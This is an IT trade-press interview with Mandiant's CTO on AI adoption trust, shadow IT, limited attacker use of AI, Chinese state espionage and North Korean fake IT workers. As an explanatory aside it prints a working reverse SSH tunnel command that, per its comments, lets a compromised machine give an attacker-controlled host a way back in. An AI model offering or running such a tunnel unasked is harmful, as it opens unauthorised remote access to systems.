Foreign AI model launches may have improved trust in US AI developers, says Mandiant CTO – as he warns Chinese cyber attacks are at an “unprecedented level”
Mandiant CTO Charles Carmakal believes AI model security concerns will ultimately improve trust in US providers


Concerns about enterprise AI deployments have faded due to greater understanding of the technology and negative examples in the international community, according to Mandiant CTO Charles Carmakal.
In conversation with ITPro at Google Cloud Next 2025, Carmakal said attitudes among firms who may have been hesitant to adopt the technology are changing rapidly.
This warming to AI, particularly toward tools from US providers such as Google, may have been accelerated by greater use of the technology on an international scale, including in territories that are viewed with suspicion by US leaders.
“Honestly, to some extent, I think the introduction of some of the foreign AI models from countries that are maybe perceived to be more risky to Western organizations has probably created a certain level of increased trust of the US-based organizations,” he said.
“Because now the concern is more of using the foreign AI models as opposed to using the domestic ones that people might have a higher level of trust and respect for.”
The past few months have seen major upsets in the AI landscape from the likes of China’s DeepSeek and Qwen. Security experts have issued warnings over flaws in DeepSeek that allow it to be easily manipulated into generating harmful content, for example.
Carmakal told ITPro this is not a new issue but in fact an extension of shadow IT. Leaders have often found it hard to identify when employees have used forbidden tools, he said, having in the past relied on unreliable interviews with employees or audits of credit card expenses to identify unwarranted cloud spend.
“So we’ve always had a shadow IT problem and right now, we have a scenario where not every company is truly embracing AI and there’s this default fear around ‘are we going to lose our intellectual property, are people going to become too complacent and too reliant on AI?’” he said.
A number of companies decided to impose an outright ban on AI use in response, but Carmakal dismissed this method as one that simply drives employees to hide their AI use by accessing it on personal devices.
Identifying improper use of AI tools and other potential vulnerabilities is a core feature of Google Unified Security, the converged security suite announced by Google Cloud at its annual conference.
The offering uses AI agents to detect when employees interact with tools or files that might pose a threat to their enterprise.
Carmakal expressed a firm belief that AI continues to benefit defenders more than attackers in the current threat landscape, dismissing fears of ‘super malware’ made using AI or other significant AI threats.
Security leaders have previously warned ITPro over the potential threats posed by agentic AI, for example, noting that cyber criminals will likely flock to these tools to ramp up their activities.
“Just overall, when we look at our investigation caseload – and we respond to north of a thousand incidents every year – what we find is that AI hasn't meaningfully enabled an adversary to break into an organization,” he stated.
The use of AI for cyber criminal purposes appears to still be in a nascent stage, Carmakal said. Attackers continue to use AI largely for rudimentary purposes, such as cutting corners when researching attacks or asking for the commands needed to create a reverse SSH tunnel.
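For illustration, the reverse SSH tunnel Carmakal mentions is a single OpenSSH command of the kind below; the hostname, user, and port are placeholders, not details from any real incident:

```shell
# A reverse SSH tunnel: the compromised machine dials OUT to a host the
# attacker controls, and -R asks that host to listen on port 8022 and
# forward any connection on it back to this machine's own SSH daemon
# (localhost:22). -N opens no remote shell; the session exists only to
# carry the tunnel. user@remote.example.com is a hypothetical endpoint.
ssh -N -R 8022:localhost:22 user@remote.example.com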
In comparison, AI could play a role in helping the cybersecurity community to identify both deliberate and unintentional flaws in code, including those in open source software.
“The benefit here is that the AI models, the engines, the knowledge, it's getting better and better and better over time,” Carmakal explained. “And so there are opportunities for us to leverage AI to do some of the things that humans are doing, but do it at a scale that humans can't operate in.”
State-backed threats continue to bite
Sophisticated attacks launched by Chinese state-backed threat actors are among the most prevalent threats facing US businesses, according to Carmakal, who told ITPro that Mandiant has been dealing with a “very large surge in intrusions by the Chinese government”.
“The espionage in the United States is at an unprecedented level and they're using very clever ways to break into organizations,” he said.
“It's a lot of exploitation of zero day vulnerabilities and edge devices: routers, firewalls, and VPNs.”
Just last week, Mandiant published a report on a newly discovered critical vulnerability in Ivanti Connect Secure VPN, connecting exploitation of the flaw to China-linked groups and calling it a sign of concentrated zero-day attacks on edge devices.
Carmakal also named schemes by North Korean threat actors as a top concern for businesses. The Google Threat Intelligence Group recently warned that fake North Korean IT workers are now branching out to European organizations in a bid to collect money for the regime and extort employers.
“There are a thousand plus people that are North Koreans that are applying for jobs and getting jobs at Western organizations,” he explained.
“For the most part, they're doing work, they're getting a check, and they're using that money to fund a nuclear program.”
Carmakal explained that these threat actors use AI technology such as deepfakes and voice clones to hide their identities, acknowledging that this is among the most prominent examples of malicious AI use he’s seen.
They are also helped by US-based ‘facilitators’ who collect work laptops and necessary company materials on their behalf – sometimes going physically into the office and presenting fake IDs to pose as the hired employee.
In August last year, the cybersecurity firm KnowBe4 accidentally hired a North Korean threat actor who quickly set about installing malware on their work device.
On the issue of ransomware extortion, Carmakal noted that although ransomware payouts are now less common, the sheer volume of attacks remains “very, very high”.
In addition to greater use of AI for security, Carmakal said leaders need to focus on defending against the threats facing their specific organization – and that Google Cloud is able to help identify these.
“I think a lot of folks come to Mandiant and Google because we just have a broad view of the threats that are out there, we have a very broad view of the pragmatic things that companies are doing to defend against today’s threats.”
Rory Bathgate is Features and Multimedia Editor at ITPro, overseeing all in-depth content and case studies. He can also be found co-hosting the ITPro Podcast with Jane McCallion, swapping a keyboard for a microphone to discuss the latest learnings with thought leaders from across the tech sector.